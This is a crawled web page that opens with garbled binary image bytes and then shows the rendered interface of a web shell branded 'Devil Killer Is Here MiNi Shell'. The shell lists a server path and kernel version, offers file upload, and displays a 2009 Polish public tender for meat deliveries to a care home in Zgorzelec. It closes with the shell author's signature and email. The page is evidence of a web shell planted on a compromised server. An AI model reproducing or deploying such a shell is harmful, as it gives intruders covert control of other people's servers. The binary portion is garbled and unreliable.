JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091012/175233-N-2009.html

<p class="kh_header"><b>Zgorzelec: Cykliczne dostawy mięsa i produktow mięsnych</b><br>
<b>Numer ogłoszenia: 175233 - 2009; data zamieszczenia: 12.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej "Ostoja" , ul. Pułaskiego 11-13, 59-900 Zgorzelec, woj. dolnośląskie, tel. 075 7752580 w. 20, faks 075 7752580.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budzetowa Dom Pomocy Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Cykliczne dostawy mięsa i produktow mięsnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje cykliczne dostawy miesa i produktów mięsnych jn
1.	Mięso wołowe bk	kg 100
2.	Mięso wołowe gulaszowe kg	50
3.	Mięso wieprzowe karczek zk	 kg	400
4.	Mięso wieprzowe szynka bk	kg	100
5.	Mięso wieprzowe łopatka bk	kg	450
6.	Mięso wieprzowe schab zk	kg	400
7.	Mięso wieprzowe gulaszowe	kg	50
8.	Mięso mielone wołowo-wieprzowe kg	250
9.	Mięso mielone drobiowe kg	240
10.	Mięso drobiowe-filet kg 240
11.	Udka z kurczaka kg	 300
12.	Kurczak kg 600
13.	Kości wędzone kg	30
14.	Kości schabowe kg 500
15.	Kości szpikowe kg 100
16.	Flaki wołowe krojone, parzone kg 100
17.	Wątróbka drobiowa	 kg 170
18.	Wątroba wieprzowa kg 60
19.         Kaszanka jeczmienna kg 120
20.         kaszanka gryczana kg 60
21.	Salceson białyWłoski lub równoważny kg 150
22.	Salceson czarny ozorkowy kg 50
23.	Pasztet drobiowy  prochowicki 160g lub równoważny szt	600
24.	Kiełbasa zwyczajna lub rownóważna kg 200
25.	Kiełbasa śląska lub równoważna kg 200
26.	Kiełbasa litewska lub równoważna kg	100
27.	Kiełbasa podsuszana  jałowcowa lub równoważna kg 60
28.	Kiełbasa podsuszana  swojska lub równoważna kg 100
29.	Kiełbasa typu szynkowa lub równoważna kg 100
30.	Pasztetowa kg 150
31.	Pasztet zapiekany	kg 60
32.	Kiełbasa krakowska lub równoważna kg 60
33.	Kiełbasa żywiecka lub równoważna kg	60
34.	Kiełbasa podsuszana  myśliwska lub równoważna kg 30
35.	Kiełbasa surowa biała kg 200
36.         szynka wiepszowa gotowana  kg 120
37.	Wędzonki	 kg 30
38.	Baleron gotowany	kg 50
39.	Szynki drobiowe kg	40
40.	Kiełbasa -mielonka drobiowa	kg 150
41.	Kiełbasa -mielonka wieprzowa kg 150
42.	Kiełbasa szynkowa mielona kg 100
43.	Parówka wieprzowa kg 150
44.	Parówka drobiowa	kg 150
45.	Kiełbasa mortadela lub równoważna kg 100
46.	Kiełbasa parówkowa kg 60
47.	Żeberka wieprzowe	 kg 100
48.	Golonka wieprzowa tylnia kg 50
49.	Nogi wieprzowe kg 50
50.	Serdelki cielęce kg	150
51.	Polędwica drobiowa kanapkowa kg 100
52.	Boczek wędzony parzony b/k kg 60
53.	Słonina bez skóry	kg 150
54.	Konserwa mięsna wieprzowa 300g szt.	500
55.	Pieczeń rzymska	kg 130
56.	Udo trybowane lub równoważne kg 50
57.	Porcje rosołowe kg	60
58.	Smalec  baton	kg 50
59.	Kiełbasa delikatesowa z indyka lub równoważna kg 200
60.	Pieczeń typu ala kaczka lub równoważna kg 100
61.	Przysmak drobiowy lub równoważny kg 60
62.	Pieczeń drobiowa	kg 50
63.	Parówki  wiedeńskie lub równoważne kg 120
64.	Paróweczki typu pyszne lub równoważne kg 50
65.	Ogonówka kg	20
66.	Boczek wędzony surowy kg	20
67.	Kiełbasa żywiecka z indyka	kg 50
68.	Szynka tyrolska kg 60
69.	Szynka kanapkowa	kg 50
70.	Szynka konserwowa kg 60
71.	Luksusowy pasztet wieprzowy 160g	kg 300
72.	Salceson drobiowy	kg	60
73.	Szynka indycza	kg	100
74.	Boczek surowy łuskany kg	30
75.	Głowa wieprzowa	kg	40
76.	Podudzie z kurczaka kg	120.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy składający ofertę powinni spełniać poniższe warunki udziału w postępowaniu zgodnie z art.22 ust.1 pkt.1 do 4 ustawy oraz na potwierdzenie ich spełnienia złożyć poniższe oświadczenia i dokumenty zgodnie z art.25 i 26 ust.2 ustawy Pzp 
1. O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:
-Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
-Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący  potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
-Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
-nie podlegają wykluczeniu z postępowania o udzielenie zamówienia
 Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu, poprzez zastosowanie kryterium spełnia- nie spełnia/tj. zgodnie z zasadą czy dokumenty zostały załączone do oferty i czy spełniają określone  wymagania Brak któregokolwiek dokumentów .oświadczeń lub złożenie ich w niewłaściwej formie będzie skutkował wykluczeniem Wykonawcy na mocy art.24 ust.2 pkt.3 ustawy z zastrzeżeniem art.26 ust.3 ustawy i odrzucony na mocy art.89 ust.1 ustawy
 Zamawiający dokona oceny ofert i wyboru najkorzystniejszej oferty spośród ofert złożonych przez Wykonawców nie wykluczonych z postępowania oraz ofert nie odrzuconych
2. Dodatkowe wymagania od Wykonawców
1. Przedmiot dostawy dostarczany będzie w godzinach od 7,00 do 9,00
2. Towar musi być dobrej jakości , spełniać wymogi norm jakościowych i smakowych
3. Środek transportu musi spełniać wymogi HACCAP
4. Higiena osobista kierowcy musi spełniać wymogi HACCAP
5. Każda dostawa musi zawierać dokument dostawy oraz czytelne świadectwo jakości i pochodzenia
6. Na towarze opakowanym powinna być czytelna data przydatności do spożycia 
7. Terminy ważności towaru dostarczanego winny być długie odpowiednio do asortymentu , wymagany jest towar świeży
8. Transport towaru musi odbywać się w odpowiednich  i czystych pojemnikach
9. Warunki płatności - przelew do 21 dni.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> VI.Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu:

Złożona oferta musi zawierać prawidłowo wypełnione i aktualne następujące dokumenty i oświadczenia  wg załączonych wzorów :
1. Wypełniony formularz oferty- załącznik do SIWZ
2. Wypełniony formularz cenowy - załącznik do SIWZ
3. Oświadczenie o spełnieniu warunków dodatkowych
A.W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:
   A.1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
A.2. Dokumenty potwierdzające posiadanie uprawnień-pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.
  A.3. Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych. oraz , że wykonawca nie podlega wykluczeniu na podstawie art.24 ust.1 pkt.1-10 Prawa zamówień publicznych
B. W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:
B.1. Wykaz wykonanych  dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, odpowiadającym swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że dostawy zostały wykonane należycie. Należy wykazać przynajmniej jedna dostawę.
C. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
C.1. Zamiast dokumentów, o których mowa w pkt. A.1 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:  nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych ust.l  zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych ust.1 
D. Dokumenty wymagane w przypadku składania oferty wspólnej: 
W przypadku, kiedy ofertę składa kilka podmiotów, oferta tych wykonawców musi spełniać następujące warunki:
1. Oferta winna być podpisana przez każdego z wykonawców występujących wspólnie lub upoważnionego przedstawiciela - partnera wiodącego.
2. Upoważnienie do pełnienia funkcji przedstawiciela - partnera wiodącego 
wymaga podpisu prawnie upoważnionych przedstawicieli każdego z wykonawców występujących wspólnie partnerów - należy załączyć do oferty
3. Przedstawiciel -wiodący partner ,winien być upoważniony do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań
W przypadku dokonania wyboru oferty wykonawcy występującego wspólnie przed przystąpieniem do zawarcia umowy o zamówienie publiczne przedłożona zostanie umowa regulującą współpracę wykonawców występujących wspólnie. Termin, na jaki została zawarta umowa wykonawców nie może być krótszy od terminu określonego na wykonanie zamówienia.
Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. A.1, A.3,  dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie   
E. Postanowienia dotyczące składanych dokumentów E.1 Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę -osoby uprawnione do podpisania oferty z dopiskiem  za zgodność z oryginałem E.2. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat.zgorzelec.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej OSTOJA
ul. Pułaskiego 11-13
59-900 Zgorzelec.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2009 godzina 10:00, miejsce: Dom Pomocy Społecznej OSTOJA
ul. Pułaskiego 11-13
59-900 Zgorzelec
SEKRETARIAT.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com